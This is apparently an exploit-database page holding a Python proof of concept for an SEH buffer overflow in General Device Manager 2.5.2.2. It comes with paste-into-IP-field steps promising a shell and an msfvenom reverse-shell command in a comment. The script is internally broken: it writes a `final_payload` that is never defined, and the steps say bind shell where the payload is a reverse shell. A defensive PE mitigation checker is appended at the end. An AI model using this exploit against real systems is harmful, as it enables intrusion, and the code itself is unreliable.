General device manager 2.5.2.2 buffer overflow (seh) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2023-07-31 |
Type : local |
Platform : windows
This exploit / vulnerability, General Device Manager 2.5.2.2 buffer overflow (SEH), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Date: 30.07.2023
# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
# Software Link 2: https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
# Exploit Author: Ahmet Ümit BAYRAM
# Tested Version: 2.5.2.2
# Tested on: Windows 10 64bit
# 1.- Run python code : exploit.py
# 2.- Open pwned.txt and copy all content to clipboard
# 3.- Open Device Manage and press Add Device
# 4.- Paste the content of pwned.txt into the 'IP Address'
# 5.- Click 'OK'
# 6.- nc.exe local IP Port 1337 and you will have a bind shell
# 7.- R.I.P. Condor <3
import struct
offset = b"A" * 1308
nseh = b"\xEB\x06\x90\x90" # jmp short
seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)
nops = b"\x90" * 32
#shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
# write the final payload to a file
try:
    with open('pwned.txt', 'wb') as f:
        print("[+] Creating %s bytes evil payload..." %len(final_payload))
        f.write(final_payload)
        f.close()
    print("[+] File created!")
except:
    print("File cannot be created!")
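
The address on the `seh` line is usable because NetSDK.dll is listed with ASLR, Rebase and SafeSEH all False. As an added example (not part of the original exploit or of the vendor's code), this Python audit reads those mitigation settings from a 32-bit PE header so that such modules can be found in an install directory. `pe_mitigations` and `build_sample` are hypothetical names, and the sample image is constructed.

```python
import struct

# DllCharacteristics bits from the PE/COFF specification
DYNAMIC_BASE, NX_COMPAT, NO_SEH = 0x0040, 0x0100, 0x0400

def pe_mitigations(image: bytes) -> dict:
    """Report ASLR, DEP and SafeSEH status of a 32-bit PE image."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not a PE image (no MZ header)")
    pe = struct.unpack_from("<I", image, 0x3C)[0]             # e_lfanew
    if image[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    _, nsec, _, _, _, opt_size = struct.unpack_from("<HHIIIH", image, pe + 4)
    opt = pe + 24                                             # optional header
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("SafeSEH only exists for 32-bit (PE32) images")
    flags, = struct.unpack_from("<H", image, opt + 70)        # DllCharacteristics
    ndirs, = struct.unpack_from("<I", image, opt + 92)
    # Data directory 10 is the load configuration directory
    cfg_rva = struct.unpack_from("<I", image, opt + 96 + 80)[0] if ndirs > 10 else 0
    handlers = 0
    for i in range(nsec):                                     # map RVA to file offset
        s = opt + opt_size + 40 * i
        vsize, va, rsize, rptr = struct.unpack_from("<IIII", image, s + 8)
        if cfg_rva and va <= cfg_rva < va + max(vsize, rsize):
            cfg = cfg_rva - va + rptr
            if struct.unpack_from("<I", image, cfg)[0] >= 72: # SEHandler fields present
                table, count = struct.unpack_from("<II", image, cfg + 64)
                handlers = count if table else 0
    return {"aslr": bool(flags & DYNAMIC_BASE), "dep": bool(flags & NX_COMPAT),
            "no_seh": bool(flags & NO_SEH), "safeseh": handlers > 0}

def build_sample(dll_chars: int, seh_count: int) -> bytes:
    """Constructed minimal PE32 headers plus one section, for demonstration only."""
    img, opt = bytearray(0x400), 0x98
    img[:2], img[0x80:0x84] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", img, 0x3C, 0x80)                   # e_lfanew
    struct.pack_into("<HH", img, 0x84, 0x14C, 1)              # i386, one section
    struct.pack_into("<H", img, 0x94, 0xE0)                   # SizeOfOptionalHeader
    struct.pack_into("<H", img, opt, 0x10B)                   # PE32 magic
    struct.pack_into("<H", img, opt + 70, dll_chars)
    struct.pack_into("<I", img, opt + 92, 16)                 # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 176, 0x1000, 72)       # load config directory
    struct.pack_into("<8sIIII", img, opt + 0xE0, b".rdata", 0x200, 0x1000, 0x200, 0x200)
    struct.pack_into("<I", img, 0x200, 72)                    # load config Size
    struct.pack_into("<II", img, 0x240, 0x10001100 if seh_count else 0, seh_count)
    return bytes(img)

if __name__ == "__main__":
    print(pe_mitigations(build_sample(0, 0)))                 # module with no mitigations
```

To audit a real module, pass `open(path, "rb").read()` instead of the constructed sample; a module reporting `aslr`, `dep` and `safeseh` all False needs to be rebuilt with `/DYNAMICBASE`, `/NXCOMPAT` and `/SAFESEH`.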